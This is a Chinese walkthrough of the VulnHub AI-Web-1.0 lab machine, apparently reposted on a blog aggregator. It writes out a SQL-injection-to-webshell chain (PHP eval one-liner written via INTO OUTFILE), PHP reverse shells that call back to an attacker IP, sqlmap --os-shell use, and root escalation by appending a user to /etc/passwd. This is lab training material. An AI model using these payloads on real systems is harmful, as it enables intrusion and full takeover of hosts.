vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)

这篇具有很好参考价值的文章主要介绍了vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

信息收集

信息收集就略了,nmap就可以了,没有太多知识

你会收集到

1.网页绝对路径,这里通过sql注入上传文件或者通过sqlmap获取–os-shell会用到vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记
2.http://靶场ip/se3reTdir777/index.php#
这是一个sql注入页面

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

SQL注入

先测试有无SQL注入漏洞,输入SQL注入测试神技 '进行测试

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

提示我们存在SQL语句错误,表示这里存在SQL注入漏洞

接着暴库,爆字段,爆表常规操作下来你会发现没有任何收获~~~并没有flag哈哈哈

方案一

通过sql注入上传文件---->蚁剑连接---->反弹shell

编写一句话木马

<?php 
echo "你好,Hacker!";
eval(@$_POST['password']);
?>

通过sql注入恶意文件

-1' UNION SELECT 1, database(), SELECT '<?php echo "你好,Hacker!"; eval(@$_REQUEST['password']); ?>' INTO OUTFILE '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php'#

访问路径有回显证明注入并执行成功

接下来蚁剑连接,寻找flag发现没有权限

反弹shell

同理sql语句上传内容为

<?php
$sock=fsockopen("靶场ip",8888);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

攻击机开始监听

nc -lvp 9999

蚁剑进入终端运行上面上传的文件vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

这时候观察攻击机监听,可见成功得到shell但是权限很低

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

但是发现www-data 具有写入 /etc/passwd 的权限,说明你可能有某种提权机会。

知识点:在Linux系统中,/etc/passwd 文件是存储用户账户信息的关键文件之一。该文件包含有关系统用户的基本信息,包括用户ID(UID)、组ID(GID)、家目录、默认shell等。

当一个非特权用户(例如,www-data)具有写入 /etc/passwd 的权限时,这可能暗示着潜在的提权机会。这是因为:

  1. 特权提升: 修改 /etc/passwd 文件允许你添加、修改或删除用户账户的信息,包括修改用户的UID、GID等。如果你能够成功地添加或修改一个具有特权的用户,那么通过这个用户可能实现提权。

  2. sudoers 文件修改: 如果你能够修改 /etc/passwd 文件,可能还能够修改 /etc/sudoers 文件。通过修改 sudoers 文件,你可以为自己或其他用户授予sudo权限,从而在系统上执行需要特权的操作。

  3. 恶意代码注入: 具有写入 /etc/passwd 权限的用户还可以通过恶意代码注入的方式实现特权提升。例如,通过修改用户的默认shell为一个具有特权的shell,或者在密码字段中插入恶意代码。

接下来提权

先使用python转换成交互式shell,这样方便理解

python -c 'import pty;pty.spawn("/bin/bash")'

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

使用命令:openssl passwd -1 -salt 用户名 密码 创建一个的账号

然后写入密码:

echo '用户名:密码:0:0::/root:/bin/bash'>>/etc/passwd

效果如下

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记移动到根目录进入root寻找flag

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

方案二

尝试使用sqlmap的–os-shell命令

–os-shell的执行原理:其本质就是在站点目录下写入两个文件。
命令可被执行的前提条件:
①站点数据库必须拥有root权限/管理员权限。 查看管理员可使用 –-is-dba (是管理员显示true,不是则显示false) 或 –-user 命令
②攻击者需掌握站点的绝对路径
③PHP主动转义功能关闭,既魔术引号功能关闭。
④站点 secure_file_priv无限制
root权限使用命令 

sqlmap -u" " --data 'uid=1&peration=Submit' --level=3 --os-shell

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

已知页面使用 语言php和网页物理地址,进行选择获得os-shell

提权

使用python搭建一个简易的服务器

使用kali攻击机python2搭建一个简单的HTTP服务器,只需要在命令行下面敲一行命令,一个HTTP服务器就搭建起来了

python -m SimpleHTTPServer 端口号

python3 python2中的SimpleHTTPServer模块已合并到Python 3中,当将源转换为Python 3的http.server

python -m http.server 端口号

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

接下来通过os-shell访问这个服务下载恶意代码(kali攻击机ip)

<?php $sock=fsockopen("192.168.109.128",7777); exec("/bin/sh -i <&3 >&3 2>&3"); ?> 

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记

kali攻击机根据代码接口进行监听

nc -lvp 端口

os-shell执行php shell.php

vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势),笔记文章来源地址https://www.toymoban.com/news/detail-809794.html

之后提权和方案1一样

到了这里,关于vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • VulnHub靶机渗透:SKYTOWER: 1

    https://www.vulnhub.com/entry/skytower-1,96/ 靶机IP:192.168.56.101 kali IP:192.168.56.102 发现22端口过滤,开放了80和3128端口,那就是优先级80,3128,22。 日常,先目录爆破 在目录爆破的过程中查看网页内容。 发现登录框,尝试万能密码。(这里用户和密码一样) 报错了,错误信息为 从这

    2024年02月10日
    浏览(86)
  • [VulnHub靶机渗透] pWnOS 2.0

    目录 一、前言 二、外围打点——信息收集 1、主机探测 2、端口扫描 3、漏洞扫描 三、信息收集+渗透测试 1、web渗透测试 2、利用sqlmap上传木马,拿www-data权限 3、Simple PHP 框架漏洞利用,拿www-data权限 四、提权 1、常规提权操作+信息收集 3、crackmapexec密码碰撞 4、root权限 靶机

    2024年04月10日
    浏览(37)
  • Vulnhub靶机渗透学习——DC-9

    本文仅个人学习所做笔记,仅供参考,有不足之处请指出! vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC9 还是老样子只有拿到root权限才可以发现

    2024年02月09日
    浏览(43)
  • vulnhub_DeRPnStiNK靶机渗透测试

    VulnHub2018_DeRPnStiNK靶机 https://www.vulnhub.com/entry/derpnstink-1,221/ flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd) 信息收集 使用nmap扫描靶机发现开放了 21 22 80 端口,

    2024年02月08日
    浏览(38)
  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(48)
  • [VulnHub靶机渗透]:billu_b0x 快速通关

    目录 前言: 访问80端口的web页面 1.扫描目录

    2024年01月21日
    浏览(41)
  • 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个漏洞靶机,老样子需要找到flag即可。 官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.o

    2023年04月19日
    浏览(47)
  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(32)
  • 网络渗透CTF实践:获取靶机Web Developer 文件/root/flag.txt中flag

    实验目的:通过对目标靶机的渗透过程,了解CTF竞赛模式,理解CTF涵盖的知识范围,如MISC、PPC、WEB等,通过实践,加强团队协作能力,掌握初步CTF实战能力及信息收集能力。熟悉网络扫描、探测HTTP web服务、目录枚举、提权、图像信息提取、密码破解等相关工具的使用。 系统

    2024年01月23日
    浏览(39)
  • 渗透测试vulnhub——Web-2.0

    目录 1、信息收集 2、漏洞利用  3、John爆破 4、命令执行漏洞 5、lxd提权  知识点: 下载地址:AI: Web: 2 ~ VulnHub 1、信息收集 使用 arp-scan -l 查看靶机ip    靶机:192.168.29.133  进行服务扫描: -sV -A -p- -O     开启了   22tcp  80http  系统:linux -sv 服务信息、-A详细信息、-p- 所有端

    2024年01月17日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包